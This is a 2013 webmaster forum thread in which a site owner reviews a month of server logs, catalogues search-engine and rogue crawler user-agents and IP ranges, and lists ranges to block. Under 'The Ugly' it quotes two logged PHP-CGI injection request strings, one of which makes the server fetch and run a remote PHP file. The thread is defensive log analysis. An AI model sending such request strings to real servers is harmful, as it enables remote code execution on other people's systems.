homepage Welcome to WebmasterWorld Guest from 23.20.91.134
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

    
Revised Spider IPs and Other Details
At Home with the Robots: 2013 edition
lucy24




msg:4544454
 8:30 am on Feb 11, 2013 (gmt 0)

At Home with the Robots: 2013 Edition

Yup, it's that time again [webmasterworld.com]. It wasn't a perfect time for bot tracking: a mid-month server move means that I ended up losing about 24 hours' worth of logs (in bits and pieces over two or three days). But we do what we can.

General disclaimer: Some of the User-Agent strings may not be exactly right. Some extra spaces and single quotes are an artifact of my log-wrangling routines.


Cut to the Chase:

If you don't feel like reading the whole thing, these are some of the new IP blocks I added after looking over January's logs. Many are associated with robots that were already blocked for other reasons, like UA or behavior, but no harm in blocking both ways.

37.139.52.23 blocked as 37.139.0.0/18 (hosting)
64.223.64.0/18 (yet another Fairpoint-within-verizon range)
68.235.38.7 (blocked as 68.235.32.0/19) One of the nasties; the UAs included "start.exe".
91.223.75 (Russia)
109.169.0.0/18, 109.169.64.0/19
178.33.142.48/28 (Russian-- I hate blocking this small, but there are humans in the neighborhood)
208.131.128.0/19 hosting (malign robot at 208.131.138.208)


The Good...

1. There are some things money can't buy. For everything else, there's Google.

Google Search:
IP: 66.249.63-95
UAs:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Googlebot-Image/1.0
Mobile:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/ bot.html)
SAMSUNG-SGH-E250/1.0 Profile/ MIDP-2.0 Configuration/ CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/ bot.html)
DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/ bot.html)

The last two are new to me, though apparently not to google. Last year at this time I saw only the iPhone version. They are still using OS 4_1 for their robot, though the real iPhone is now up to 6_1. The mobile UAs never ask for anything but pages; the vanilla googlebot gets everything; the imagebot gets images-- and, on one isolated occasion, the favicon.

Speaking of which: the google family remains somewhat random about robots.txt. Generally they pick it up every day or two. Sometimes it can be well over 24 hours. Can't say I especially care for this. I'll bet someone has a ready-made php script that will unconditionally block any robot that has not asked for robots.txt within the past 24 hours. But they do seem to obey what they read-- apart from claiming not to understand the Crawl-delay directive, so you have to go to gwt if you don't want them wolfing down multiple files in a single second. If you are in the habit of serving custom robots.txt files based on the asker's current UA, note that all requests for robots.txt come from the googlebot by that name.

Numbers: Slightly more than twice as many visits as last year. My record-keeping is admittedly slapdash, but I don't think I have twice as many files. About a quarter of the change is due to increased Googlebot-Mobile activity.

Referer: Conversely, there are not as many Googlebots arriving with a referer-- not that the numbers were ever especially huge. Here's a quirk I didn't notice last year, though it happened then too. Sometimes the referer requests come soon after a visit to the page it gives as referer. Other times there's no connection. And the original visit may not have been from the googlebot at all; sometimes it's one of the mobiles.

Faviconbot:
IP: 74.125
UA: blank

If I didn't have a <files> exemption for favicon.ico, the faviconbot would never get in at all. The exemption wasn't made for google's benefit; it's to help flag humans who may have been locked out by mistake. (Some robots will pick up the stylesheet that goes with the 403 page. I know of only one that also gets the favicon.)

Google Preview and Google Translate:
I didn't count them with the robots this year, except for some special cases. Preview persists in trying to get at piwik.js, even though they cannot possibly not know it's an analytics program.

Food for thought: Why, exactly, do previews-- Google, Bing, Seznam-- want javascript files? Most scripts involve either feature detection or user interaction. So a preview-with-scripting doesn't show what you would see. It only shows what the current Not-A-Robot would see.

Further Unanswerable Question: Since Preview does not play sounds, either upfront or on request, and since the .midi extension can't be anything but a sound file ... why does Google Preview persist in asking for .midi files? I don't know whether this is a new habit or an ongoing one. Last year I didn't have any sound files worth mentioning-- and the ones I did have were formatted as <a href> downloads. Now I've got a slew of them embedded in one subdirectory.

2. We Try Harder.

Once again, Bing/msn is the single most common robot if you count all requests. But this year it remains in the #1 spot even if you don't count robots.txt. There have been recent posts commenting on increased bingbot activity. It's definitely evident in my case.

Key change from last year: After looking at the behavior of the assorted bing/msn entities, I blocked the plainclothes bingbot. So you won't find it here.

bingbot
IP ranges: 65.52, 157.55, 207.46
plus 65.54.247.145 for BingSiteAuth (BWT) only
UA: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)

The bingbot retains a hearty appetite for robots.txt, though it has dropped back a little from last year's morbid extremes. In the course of the month, about 2/3 of all robots.txt requests came from the bingbot-- down from 80% last year. One time it went seven hours without asking for robots.txt. Conversely, I don't see any place where the bingbot-- by that name-- asked more than two times in a row. But overall, about 1/3 of their requests were still for robots.txt.

msnbot
IP ranges: 65.66, 131.253, 207.46
UA: msnbot/2.0b (+http://search.msn.com/msnbot.htm)

You can tell how busy bing was: they had to bring the vanilla msnbot out of retirement to pick up some of the overflow. Most of the time it just asked for robots.txt followed by the sitemap, but a few times around midmonth it even collected a page or two.

msnbot-media
IP: 65.66, 131.253, 207.46
UA: msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)

This robot went through a striking sea change early last fall. Up to then it had an absolutely consistent pattern: robots.txt, one image, and then the page the image belongs to. Things started to go haywire on 21 August (I went back and checked logs). For the next week or so it alternated between about 4 robots.txt to every one image. Its last old-style visit-- robots.txt, image, page-- came on the 29th. Then a few more robots.txt, one image ... and finally, from the 2nd to the 14th of September, came 64 (sixty-four) consecutive requests for robots.txt. After that it settled into its new pattern: robots.txt, image, two by two in strict alternation. No pages.

Bing Preview
Everything I said about Google Preview applies equally to bing. They didn't happen to visit any gallery pages this month, so I don't know if they would have gone for the .midi files.

3. Can you say 'rat' in Russian?

IP (Russia): 95.108.151.244, 95.108.150.235, 178.154.243.81
IP (US): 199.21.99.106
IP (favicon only): 37.9.84.253
UA:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)
and two new ones:
Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)
Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)

Obviously those are not Yandex's complete IP ranges, but they like to pick an exact address and stick with it. So these are the only ones I've seen this month. Current visits are divided about half-and-half between the Russian and US IPs. In a complete flipflop from last year, the 95. range is used only by the YandexBot, while 178. is only for images. The US range gets both.

I don't know what they do with the favicon. No skin off my nose. Their information page [help.yandex.com] sheds no light on the MirrorDetector. Pretty droll in my case, since my only mirrored pages are in a language they don't support. (Their WMT says so; there's a section that lists crawled-but-not-indexed pages and says why for each individual one. Don't you wish G and B had the same feature?)

Yandex's imagebot seems to have been on vacation-- possibly it runs on the Orthodox church calendar, which currently lags 13 days behind the Gregorian-- and didn't show up until the 18th. But it quickly made up for lost time, mainly by scrambling around and confirming that most of my pictures hadn't changed since last time.

Seznam
IP: 77.75.77.11, .17
UA: SeznamBot/3.0 (+http://fulltext.sblog.cz/)

Czechs must spend a lot of time online. I can't think of another country this size whose search engine is so visible. Half of the time they just pick up robots.txt and the sitemap, but sometimes they'll get a few pages as well. Like Google and Bing, they've got a preview, in their case called the screenshot-generator. And just like the big boys, it has to be told to stay the bleep out of piwik.

Mobile Goo
IP: 218.213.13x
UA: DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://search.goo.ne.jp/option/use/sub4/sub4-1/)

With a name like that, could it come from anywhere but Japan? Here's the odd part: I was going to say that I first set eyes on them in March of 2012, though they didn't really become active until this past month. But processed logs say it ain't so. They paid a couple of long visits way back in April 2011, picking up several hundred HEADs of images. Only. Some months later they came back and behaved so innocuously that I've ignored them ever since. So right now I can't tell if they're pushing up their activity level, or they're one of those robots that operates by fits and starts.

BlekkoBot
IP: 38.99.97.36 and 199.87.253.49
UA: Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http://blekko.com/ about/ blekkobot)

As far as I know, these folks never set foot on my site until April 2012. It's still not a very heavy foot: robots.txt, front page, favicon, one specific inner page. (Always the same one.) The person who runs this robot reads, or used to read, the WebmasterWorld forums. That's all I know about it.

TosCrawler
IP: 60.36.84.49
UA: TosCrawler/ Nutch-1.6 (http://www.toshiba.co.jp/rdc/about/crawl_info.htm; 'Rdc-crawler at ml dot toshiba dot co dot jp')
changed just a few days ago to
TosCrawler/Nutch-1.6 (http://www.toshiba.co.jp/rdc/about/crawl_info_en.htm; 'Rdc-crawler at ml dot toshiba dot co dot jp')

Another newcomer, as far as I can tell. First known sighting, September 2012; they didn't really become active until November. The info page says
The main goal of developing the crawler is to collect web pages for R&D related to natural language processing. Using the collected web pages, we extract new or unknown words, and we analyze statistical information such as word frequency. Utilizing this information, we develop highly accurate statistical machine translation systems, text-to-speech systems and so on.

I hope this is true, because it's something I would definitely support. Insert nasty cracks ad lib about caliber of linguistic information to be gleaned from study of any site with my name on it. They are also one of the very, very few places that answer "Is this your robot?" e-mails. Currently they seem to be absolutely in love with my site; it's especially noticeable because I haven't got around to ignoring them yet.

Yeti (Korea) and Baidu (Japan)
IP: 61.247.204 (Yeti), 119.63.19x (Baidu)
UA:
Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Not much activity this month, but I note them for appearances' sake. I wouldn't swear to the MSIE 7 one. It comes from 119.63.193 which does belong to Baidu (119.63.192-199) but their regular spider activity is from ..196.

MJ12bot
User-Agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.1; http://www.majestic12.co.uk/bot.php?+)

No change from last year, when I said:
They refuse to have their own IP, so you can't tell if it's the real thing or a spoofer. They also seem to have a lot of trouble getting names right: constant directory-slash redirects alternating with top-level www redirects.

One time this month they ate a steady stream of what would have been /index.html redirects, except that they were operating from a blocked IP range.

exabot
IP: 193.47.80.81
UA: Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)
Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot

The only reason I tolerate these guys is that they're simply too boring to block. At some point when I wasn't paying attention-- last December, it turns out-- they added the "BiggerBetter" UA. It must be working off an ancient shopping list, because its only requests to date have been for pages that ceased to exist some time in 2011. This sends it scurrying for the sitemap-- but it might have done this anyway.

YioopBot
IP: 173.13.143.74, ..78
UA: Mozilla/5.0 (compatible; YioopBot; +http://173.13.143.74/bot.php)

Like the BlekkoBot, this one is run by a WebmasterWorld reader. Last year it appeared only as a walk-on, with a single occurrence of
173.13.143.78 - - [15/Jan/2012:05:14:54 -0800] "GET /robots.txt HTTP/1.1" 206 517 "-" "Mozilla/5.0 (compatible; YioopBot +http://www.yioop.com/bot.php)"
Notice the 206? I don't think I have ever met any other robot that bothered with a 206 on robots.txt. The YioopBot's record for January 2013 is sixteen of them in a single calendar day. My preliminary guess was that it's running one of those scripts that says "If the file has changed, give it to me; otherwise just toss me the header." Further investigation suggests that this robot simply doesn't have a very big appetite. January was a narrowly focused month: apart from two 206's on the sitemap-- and one on the Panda Page for appearances' sake-- it wasn't interested in anything but robots.txt. But on a few visits in November and December it really extended itself, scooping up 206s right and left. If anyone knows more about this robot I would like to hear it; I took a closer look at those November-December hits and simply couldn't make head or tail of it.

CareerBot
IP: 178.77.126.55
User-Agent: Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)

I think this one first showed up in July. Information page says:
Der CareerBot ist der Webcrawler von Career-X. Der CareerBot crawlt durch das Internet, um aktuelle Stellenangebote von Unternehmen zu finden.

Evidently my front page is enough to tell it that I am not an Unternehmen and it won't find any aktuelle Stellenangebote here, because that's all it has ever asked for. Yawn.

Verisign
IP: 69.58.178.59
User-Agents: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1
BlackBerry9000/4.6.0.167 Profile/ MIDP-2.0 Configuration/ CLDC-1.1 VendorID/102 ips-agent

These folks swing by once a month like clockwork. Generally they just pick up the top-level directory pages. I don't know what they're doing, but it's no skin off my nose.

TurnitinBot
IP: 38.111.147.83
UA: TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)

One of those plagiarism checkers, I think. I've only seen them about six times in the past year, generally picking up a dozen or so pages. Shrug.

IA archiver
IP: 174.129.237.157
User-Agent: ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)
IP: 207.241.226.10x
User-Agent: ia_archiver(OS-Wayback)

Some people hate this robot on principle. Some like it on the same principle. I'm not looking to start a fight --not here and now, anyway-- so I just note its continued existence.

other archivers
IP: various
User-Agent: Mozilla/4.0 (compatible;)
Requests: images only

Someone once explained to me what these critters do. They're somewhere on the cusp between robot and human. The one I see most often comes from one of the Keewaytinook Okimakanak (chiefs council) ranges, meaning satellite internet at the far end of Ontario. As a further oddity, most of their requests are for an image file that hasn't been used since October-- that is, the file itself exists, but it's no longer used by its formerly requesting page. One of these days I will ask them what they plan to do with all those copies of my administrative gif. There is no shadow of a doubt that the original visitor was human.

The rest of the rest:

Finally there are the visitors who must have some pretensions to robotitude, because they asked for robots.txt. Most of them went on to ask for the front page and nothing more. If that's all they're going to ask for, I don't even particularly care if they got robots.txt or not. The group includes some that were more visible last year: picsearch, findlinks, and 80legs among others. This year they just popped their heads in for a moment. Or possibly-- like the YioopBot-- they did their major pickups in some other month, so I simply didn't notice them.


To be continued...

 

lucy24




msg:4544680
 8:08 pm on Feb 11, 2013 (gmt 0)

At Home with the Robots: 2013 edition, Part Two

Given a choice between bisecting a post and trimming it...

The Bad...

New This Year
The robots themselves aren't new, only their position. These are the ones I reclassified from "No skin off my nose" to "Get thee hence!" after last year's closer look.

The plainclothes MSIE-bot
IP: 131.253, 65.52, 65.55
UA: begins with Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 or 5.2 and then varies at random
robots.txt? What on earth for? I'm just a human who works for Microsoft and therefore naturally uses MSIE 7. Last year, most visits followed a pattern: one random html file, followed by any one non-image subsidiary file like css or js. This year it's nothing but .html files. Maybe it's because they're denied access to that initial page, so they don't know what to ask for next.
Someone hereabouts said that the plainclothes MSIEbot isn't a robot at all; it works for Bing Translate. Personal experiment doesn't support this interpretation, though.

Ezooms
IP: 208.115.111.72, ..113.88 (this year, as last year, it's only these exact two)
UA: Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Distinguishing feature: UA that includes a gmail address. I originally blocked them because they share an IP with the not-so-nice dotbot. The dotbot hasn't been around in a while, and ezooms seems to obey robots.txt, so I was thinking of unblocking them. After some cursory research I dropped the idea. Among other things, they claim their connection is through "dotnetcotcom.org" which kinda suggests that it's all the same robot anyway. And I don't think anyone has ever figured out what they do.

YahooCacheSystem
IP: 98.139.241.24n
UA: YahooCacheSystem
I haven't seen these folks since November. But robots sometimes take long breaks, so I mention them here.

Yahoo! Slurp
IP: 72.30, 98.137
UA: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp) NOT Firefox/3.5
Got that? NOT Firefox 3.5, so don't go treating us as if we were Firefox 3.5, meaning ... uh ... don't lock them out? (Even Camino, whose UA string is a little iffy, says emphatically "like Firefox 3.6". Clearly something must have happened in that 1/10 of a step.) Distinguishing feature: All requests-- blocked, of course-- are followed by the 403 page's style sheet. But by weird coincidence they only ask for the favicon when the original request was for the front page. Hmmm.

This year we also have a
Yahoo! Slurp China
IP: 110.75.173-176
The name says it all. In linguist-speak, this is called Double Markedness.

mail.ru
I've gone back and forth on these guys. Somewhere in the background is a legitimate Russian ISP. Latest discovery: As with bing/msn, there are two entirely different entities. I've provisionally unblocked the robot only. So far they don't seem to have noticed.

Robot:
IP: 217.69.133.68, ..134.56
UA: Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/ help/robots)
The robot behaves perfectly well. Asks for and obeys robots.txt, no matter how often it gets the door slammed in its face.

Images:
IP: 217.69.135.91
UA: Mozilla/5.0 (compatible; Mail.RU/2.0c)
and
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
This one gets us into profiler territory. Every visit follows the same pattern:
GET {some image from /games/ directory} with blank referer, using first UA
GET {exactly the same thing}
GET {same image file} with referer http://go.mail.ru/search_images, using second UA

Repeat with four more /games/images/ files, for a total of 15 requests at intervals of 1-2 seconds. They do this about twice a month on average. Past experience with a similar pattern suggests they may respond to the 127.0.0.1 redirect; I'll try it one day. A final quirk is this:
217.69.135.91 - - [07/Feb/2013:09:08:08 -0800] "GET http://www.example.com/games/images/SquatterPic.jpg HTTP/1.1" 403 1495 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0c)"
All requests come through like that in logs. File under: Yet another thing that someone once explained to me but I've forgotten the explanation.


Same old same old

Baidu (China):
IP: 123.125; 180.76; 220.181
UAs: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/ search/ spider.html) the same as Baidu-Japan
Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; Tablet PC 2.0)

Baidu has been getting clumsy: there's a fair number of requests for broken URLs like "/fonts/naamaj" or "/hovercraft/n". Looking back, I see it was already doing this a year ago. Well, if you're going to get the door slammed in your face regardless, why bother to get the name right?

Soso:
IP: 124.115.6.13
UA: Mozilla/5.0(compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm) note missing space
How are the mighty fallen! Couple of years back, Soso was one of the ickier spiders around. Then, starting around September 2011, it was only allowed to give its name when asking for robots.txt-- the robotic equivalent of working traffic on Staten Island. The rest of the time it came in with a generic MSIE UA. Even this got squashed partway through January 2012, though I didn't realize it at the time. Since then, all the SosoSpider has done is ask for robots.txt. And it can't even get this right. It asks for robots.txt with the wrong form of the domain name, gets redirected, and never bothers to come back and ask again with the correct name. Once a day, every day.

JikeSpider:
IP: 1.202.218.71
UAs: Mozilla/5.0 () and that's all
Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html)
I don't know if this one is on its way in or on its way out. Since it operates from China, it will be blocked regardless.

There are assorted other Chinese robots-- some of whom try to disguise themselves by claiming Russian as their first language-- but they're all much of a muchness.

The Ukrainians
IP: 46.118.118, 92.249.127, 94.153.65.92, 176.8.91.143, 178.137.162.140, 193.106.136, 195.242.218, 213.110.133.221
UA: random
Like the man said: The Ukrainians you will always have with you. But oh! what a pang of nostalgia it gave me to find them still at it. Their favorite page is still lions.html, with occasional forays into duct_tape, Rambles and-- late in the month-- mice.html (a gallery page and therefore pointless without its illustrations, as is lions). They always make two consecutive requests, always with a fake referer and an improbable UA like
Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)
or
Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)
What do they want? Who knows? Who cares? Maybe it's just referer spam. Most are from .ru domains so they would be blocked even if I didn't already know the IP. The double request is new since last year; they used to come in threes. I'm not complaining.
Note that 176.9 is Hetzner, so 176.8.0.0/15 can be conveniently blocked in one go.

The Russians
IP: 37.139.52.23, 91.223.75, 91.237.249, 95.24.182.19, 176.195
UA: various
Exactly the same as the Ukrainians except that, uh, they're from Russia ;) The set at 91.223.75 (that's 91, so you really are stuck at the /24 level) is a new addition to the block list. They'd always given .ru referers so I never noticed that the IP itself was open, until they came waltzing in with a .com: Oi! How did you get in here?

ahrefsbot
IP: 173.199.114-120
User-Agent: Mozilla/5.0 (compatible; AhrefsBot/2.0; +http://ahrefs.com/robot/)
A year ago:
I have no idea what, if anything, they're about. I just know that they seem to think robots.txt is non-perishable: about once a month they pick up three copies in a batch, and then carry on regardless. Don't know whether they even read it; they don't dig deeply enough for me to be sure.

They've now gone over to a single weekly pickup of robots.txt. And, hm, they seem to be operating from an entirely new IP. They're blocked by UA, so I never noticed.

facebookexternalhit
IP: 66.220.144-159; 69.171.224-255; 173.252.64-127
UAs:
facebookexternalhit/1.0 (+http://www.facebook.com/externalhit_uatext.php)
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
The 1.0 UA is apparently brought out to switch-hit when 1.1 gets tired, or anticipates getting tired. When there's a long string of requests for the same file, they go by pairs: 1.1, followed within one second by 1.0.
I have yet to see one iota of evidence that facebookexternalwhatsit can benefit me in any way whatsoever. But I made one change: There's no reason to block HEAD requests, since they're simply confirming that a given image file exists. (I've never prevented them from looking at pages; they show up in logs as 206.)
The 173.252 range is a new one on me; looking back, I first find them in November.

Trendmicro
IP: 150.70 (last year I also met them at 216.104.15)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Some folks don't mind them. I say I don't like their face. I especially don't care for them requesting piwik files-- accompanied by the same query string that their preceding human just used.

websense
IP: 208.80.194 (full range .192-.199, but .194 is all I see)
User-Agent: varies
Much less active than last year at this time. Whew. Last year I was especially riled about their sister IP, 208.87.232-239, which attacked my sister site, the art studio. I have since learned that the reason they put on such a good impersonation of a human is that they were human. Oops. Under the name SurfControl, this IP is used as a proxy by our country government offices. You might think this serves people right for browsing the web on office machines during work hours, but the studio has a quasi-official status so you have to let them in.

... and similarly
TalkTalk
IP: 62.24
Somewhere at the back of this group is a normal ISP. It's got parental-control functions and anti-virus functions and who knows what else. Anyway, they annoy me.

NOC (for want of a better label)
IP: 184.22.183.114 and ..211.146
UA: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Last year at this time they gave their address as ..182.90 and ..46.14 with the same UA. I didn't especially notice them at the time; there were a few visits in the Miscellaneous bin. I have no idea what they're looking for, but people using FF 6 are generally up to no good. Random skipping through mid-year logs finds them using an even more unlikely "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)". Regardless of exact name and address, they keep asking for the same handful of pages over and over, inparticular the trio
/games/
/games
/games/index.html

which are all, of course, the same file. If they weren't blocked (84.22 complete), two of the three would get redirected.

auto-referers
Still around, and I still haven't found a universal way to block them. Identify after the fact, yes. Make a RewriteRule to send them into oblivion, no. Requests for some of the largest files are individually coded in htaccess; that's about all I can do.


Two for the Profilers

Some robots are distinguished by behavior patterns rather than UA or IP. For the past few months I've been particularly vexed by

the index.php botnet
IP: various
UA: various
That's my personal name for them, faute de mieux. Botnets don't have official names do they?
Pattern: Always four requests, in this order:
#1 any random interior page, usually with auto-referer, sometimes a spam-type referer
#2 /fonts/ with either auto-referer or my front page as referer
#3 /fonts/index.php with /index.php as referer
#4 my front page, again with /index.php as referer.
I've picked out a few recurring IPs for blocking, but in general there's not a ### thing I can do. They're not clearly identifiable until the third request-- and that one's blocked anyway because of the .php extension. I could block the mydomain/index.php referer, but that's about it.

ukiuq.html
IP: various, all of them already blocked
UA: various, from quasi-human to blatantly robotic
Ukiuq (not its real name) is a UCAS legacy font so obscure that-- well-- it's so obscure that when I last searched for its real name, my page popped up in first place. That's obscure.
Pattern: Four requests, in this order:
#1 /fonts/ukiuq.html, with either auto-referer or outside spam referer
#2 my front page, with /fonts/ukiuq.html as referer
#3 my front page, with auto-referer
#4 same again


Gone and Soon Forgotten

A handful of robots that were highly visible last year don't seem to be around any more. Unless they simply took the month off. Shrug.

oBot
Gigabot
orangeask


And The Ugly

These are the unambiguous ones: the robots that stroll in and ask for "login.php" and files with "myadmin" in the name, or try to PUT and POST. There is apparently a finite number of likely robotic IPs, because I didn't get any completely new ones this time around. Most memorable:

GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://example.net/nophp/test.php

and similarly

POST /?-n+-d+allow_url_include%3D1+-d+auto_prepend_file%3Dphp%3a%2f%2finput
... sent to the wrong domain name, so it was met with a 301 that magically changed the attempted POST into a GET. (Just recently I read an explanation of how and why this happens, but-- stop me if you've heard this one-- I don't remember the details.)


One-Offs

There weren't nearly as many of these as last year. Mainly:

Robot from UnityMedia
IP: 5.146.82.156
UA: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
60 requests, all 206, 301 or 404. Here's the odd thing: I have no record of ever seeing this IP before. But it must have been here at some time in the distant past, because it came in with a shopping list of files that ceased to exist up to two years ago. Hence the slew of 301s and 404s. The files that did exist were all old ones. But it wasn't programmed to deal with 301s, so it kept picking up the same redirects again and again without ever proceeding to the requested file.

AmazonAWS
IP: 184.72.175.146
UA: Java/1.6.0_24
33 consecutive requests for the same long page. Public-domain content, and the requests were generally a minute or more apart, so it's just the weirdness of the thing. How do they even find this stuff in the first place? What do they do with it?

dstiles




msg:4544717
 9:33 pm on Feb 11, 2013 (gmt 0)

I thought fairpoint was broadband?

I have 178.32.0.0/15 blocked as being OVH assigned to various EU countries.

208.128.0.0 - 208.167.191.255 I have blocked as being essentially sub-lets of savvis.

Yandex bot has many very small IP ranges.

lucy24




msg:4544726
 10:07 pm on Feb 11, 2013 (gmt 0)

I thought fairpoint was broadband?

Yes, they're infuriating. It's possible they have services that come with free www space-- my cable internet did-- so some people are using that for bot-running. Or, I guess, eliminate the middleman by running the robots directly from their home computers. All I know is I've met a number of robots from fairpoint IPs and I can't block the whole range.

Oddly enough I have never tried contacting fairpoint about the issue, so I don't know whether they deal with it. If they're anything like my current ISP's approach to spam e-mail, I doubt it.

Come to think of it, OVH itself is partly human isn't it?

dstiles




msg:4545058
 8:58 pm on Feb 12, 2013 (gmt 0)

OVH may be partly human but if so it's not partlying on my server. :)

I have 5 fairpoint ranges and only 2 bad IPs since 2010 - one of 5 hits (across 5 days last december) and one of 7 hits (2 days last month). The latter began the hits with the UA below - I only take special note of the first UA and would have to search for successive ones...

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

cpollett




msg:4550685
 5:08 pm on Mar 3, 2013 (gmt 0)

Some quick remarks on YioopBot... It does range requests of 50000 bytes by default to conserve hard drive space since it is running off some mac mini's in my guest room with 4tb drives attached. It might scarf down more if the data is chunked, but then does a post-download chop to 50K. In November I was doing single day test crawls. Dec 17 - present I have been doing a longer term crawl about 240million pages so far. Periodically, this has been stopped for brain transplants, and also I have been testing some other kinds of indexing operations on Wikipedia dumps and the UT Zoo Usenet archives.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved